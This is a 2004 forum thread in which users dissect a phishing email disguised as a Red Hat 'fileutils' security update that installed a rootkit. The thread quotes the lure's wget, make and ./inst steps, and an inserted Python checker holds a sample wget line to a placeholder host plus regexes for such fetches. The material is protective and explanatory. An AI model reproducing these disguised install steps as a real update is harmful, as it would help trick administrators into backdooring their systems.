RH users are the new target for crackers with too much time on their hands
Parcival
10-25-2004, 05:28 AM
Freshly from my heise newsletter:
E-Mails have appeared trying to convince people to install an unsigned "security update". However, it's malicious software installing a backdoor. The e-mail seems to look very convincing - I guess since Linux is so strong, the crackers target human beings as the weakest link.
This is the message sent out:
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately
apply the fileutils-1.0.6 patch.
This is a critical-critical update that you must
make by following these steps:
First download the patch from the Security RedHat mirror:
wget [URL removed by Parcival]
Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst
RedHat insists that all their emails and security updates are signed with GPG/PGP!
banzaikai
10-25-2004, 06:21 AM
Don't worry, the idiot(s?) are getting Slashdotted as we speak... http://it.slashdot.org/it/04/10/24/2352234.shtml?tid=172&tid=110&tid=218&tid=106
I'm running 7.2, and haven't seen anything in my mail, yet. Besides, I've never had anything sent to me from Red Hat that had so many grammatical errors as this crap. Say what you will, but RHN is professional in everything they do.
I like the part about it not affecting BSD or Solaris: Why should RHN give a rat's behind about BSD or Solaris? If this exploit affects them, then it's BSD and Solaris' problem, right?
"Critical-critical"? Even RHN knows how to use the adverb "very".
Above all, the RHN releases their patches as rpms with up2date (or apt-get/yum with Fedora). No tarballs involved.
Nothing to see here, people. Move along...
banzai "yum update" kai
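The red flags banzaikai lists (no GPG/PGP signature, a tarball fetched with wget and built by hand instead of a signed RPM via up2date, the obsolete "fileutils" name) can be turned into a simple advisory check. This is an added example, not code from the thread or from Red Hat; the message bodies are constructed samples, the URL is a placeholder, and the RHSA identifier format is assumed.

```python
import re

# Constructed sample: the hoax body quoted in the thread, URL replaced by a placeholder.
HOAX_BODY = """Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
The RedHat Security Team strongly advises you to immediately
apply the fileutils-1.0.6 patch.
wget http://example.invalid/fileutils-1.0.6.patch.tar.gz
Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst
"""

# Constructed sample of what a genuine, clearsigned advisory looks like
# (signature bytes omitted; the advisory id is a made-up placeholder).
LEGIT_BODY = """-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Red Hat Security Advisory RHSA-2004:0000 (constructed sample id)
Updated coreutils packages are available. Apply with:
  up2date
or verify the package first:  rpm --checksig coreutils-*.rpm
-----BEGIN PGP SIGNATURE-----
(signature omitted in this constructed sample)
-----END PGP SIGNATURE-----
"""

def advisory_red_flags(body: str) -> list[str]:
    """Return the phishing indicators found in a purported vendor advisory."""
    flags = []
    if "-----BEGIN PGP SIGNED MESSAGE-----" not in body and "-----BEGIN PGP SIGNATURE-----" not in body:
        flags.append("no PGP signature block (vendor advisories are signed)")
    # Legit updates come as signed RPMs via up2date/yum, never as a fetched tarball or .bin.
    if re.search(r"\b(wget|curl)\s+\S+\.(tar\.gz|tgz|bin)\b", body):
        flags.append("tells you to fetch a tarball/binary instead of a signed RPM")
    # A bare 'make' or './inst' line means 'build and run this by hand as root'.
    if re.search(r"^\s*(make|\./inst|\./install)\s*$", body, re.M):
        flags.append("asks you to build and run an installer by hand")
    # fileutils was merged into coreutils in 2003; a current advisory would not name it.
    if re.search(r"\bfileutils\b", body):
        flags.append("names obsolete package fileutils (merged into coreutils)")
    if not re.search(r"\bRHSA-\d{4}[:-]\d+", body):
        flags.append("no RHSA advisory identifier")
    return flags
```

Any non-empty result is reason to stop and verify the message through the vendor's signed channel rather than act on it.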
Icarus
10-25-2004, 07:13 AM
It's called Social Engineering, it's the oldest con job. This technique has been used countless times on Windows (ILOVEYOU) and it is no surprise to see it attempted within the Linux community.
Red Hat is the most popular distro, so it's no surprise to see it attempted there first.
Any bets we'll get a post here this week with a topic like "I installed the fileutils patch from Red Hat and weird things have been happening ever since" :p
Parcival
10-25-2004, 08:33 AM
Originally posted by Icarus
Any bets we'll get a post here this week with a topic like "I installed the fileutils patch from Red Hat and weird things have been happening ever since" :p
:eek:
Well, I guess right now it's not a big trap since Linux is being used by geeks who know what they're doing. However, once Linux has taken over Microsoft's 94% market, I bet there will be plenty of former MS sheep getting caught by the wolf. :D
rocketpcguy
10-25-2004, 08:57 AM
The fake Fedora web site linked in Slashdot doesn't work anymore. Was it because it was Slashdotted?
Icarus
10-25-2004, 10:15 AM
Originally posted by rocketpcguy
Was it because it was Slashdotted?
Does that really surprise anyone? It's probably hosted on the guy's home Comcast server :p
bwkaz
10-25-2004, 06:47 PM
Or some server in China, with a 1 kilobit outbound link... ;)
Besides, who in their right mind would install a binary patch that's distributed as a tarball? Morons... :rolleyes:
Now, if they said "get the fileutils sources, apply this patch, and reinstall", then I might possibly be tempted to believe them. However, the "fileutils sources" part is also totally bogus -- nobody uses fileutils anymore. It's been subsumed into coreutils as of, oh, about ... April 2003. ;)
hard candy
10-26-2004, 12:38 PM
However, the "fileutils sources" part is also totally bogus -- nobody uses fileutils anymore. It's been subsumed into coreutils as of, oh, about ... April 2003.
Bwkaz, do you have posters of source code on your bedroom walls? just wondering. :)
happybunny
10-26-2004, 12:44 PM
Just in case someone I know falls for this.
Did someone grab the gz and look at it? Is it a rootkit thingy? Or does it delete stuff?
Does anyone know if any of the anti-virus utilities protect against this yet? ClamAV? McAfee?
mostly curious
Icarus
10-26-2004, 01:52 PM
Happybunny, it's most likely a rootkit. It instructs them to extract it to / so it overwrites the ls and other commands with the exploited ones.
Originally posted by hard candy
Bwkaz, do you have posters of source code on your bedroom walls? just wondering. :)
You kidding? The guy is wired directly to the entire O'Neil library! He sees code, like Neo in the Matrix :D
EnigmaOne
10-26-2004, 01:53 PM
It's a rootkit (contained in a '.bin' file).
BTW, nobody who ever received a valid RHN advisory--or even saw one over somebody else's shoulder--would have fallen for this.
Red Hat's official line, with respect to updates and patches, has always been "run up2date on each affected server," so this was pretty much a matter of:
"Hello. You already know we aren't legit, but please install this disguised RPM (which contains our customized rootkit) because we can't hack your machine without your assistance."
I doubt the AV folks would even bother with this, since it's pretty much a situation wherein any admin dumb enough to install the code should be flogged and terminated on the spot.
bwkaz
10-26-2004, 07:06 PM
:D
Not quite posters on the wall. I just remember the small flurry of posts to some of the LFS lists when the project name changed (the LFS book that was current at the time still listed fileutils, sh-utils, and whatever-other-utils). So whenever I see "fileutils" I manually translate that to "coreutils -- and is this message old, or are these people really that clueless?". :p
Parcival
10-27-2004, 12:44 PM
Originally posted by Icarus
You kidding? The guy is wired directly to the entire O'Neil library! He sees code, like Neo in the Matrix :D
:eek: bwkaz, will you let me borrow your glasses? :)
bwkaz
10-27-2004, 07:15 PM
I do need a new pair. These are about 4 years old, and the scratch-resistant coating is starting to come off...
:p
banzaikai
10-30-2004, 07:47 AM
from: Icarus
You kidding? The guy is wired directly to the entire O'Neil library! He sees code, like Neo in the Matrix
Err. Actually, I can read the "code" on the Matrix posters. Just hold it up to a mirror, and read the Katakana (I really don't need the mirror, either).
Buncha gobbledygook, actually.
banzai "I know Kung-fu!" kai
cybertron
10-30-2004, 01:10 PM
I posted a talkback about this article on Linux Today with a joke about "rm -rf /" being a vulnerability too by this definition, and some Windows user asked me if "rm -rf /" was an algebraic expression :D
Hence the reason that when more non-technical people switch to Linux this sort of thing will be more of a problem :rolleyes: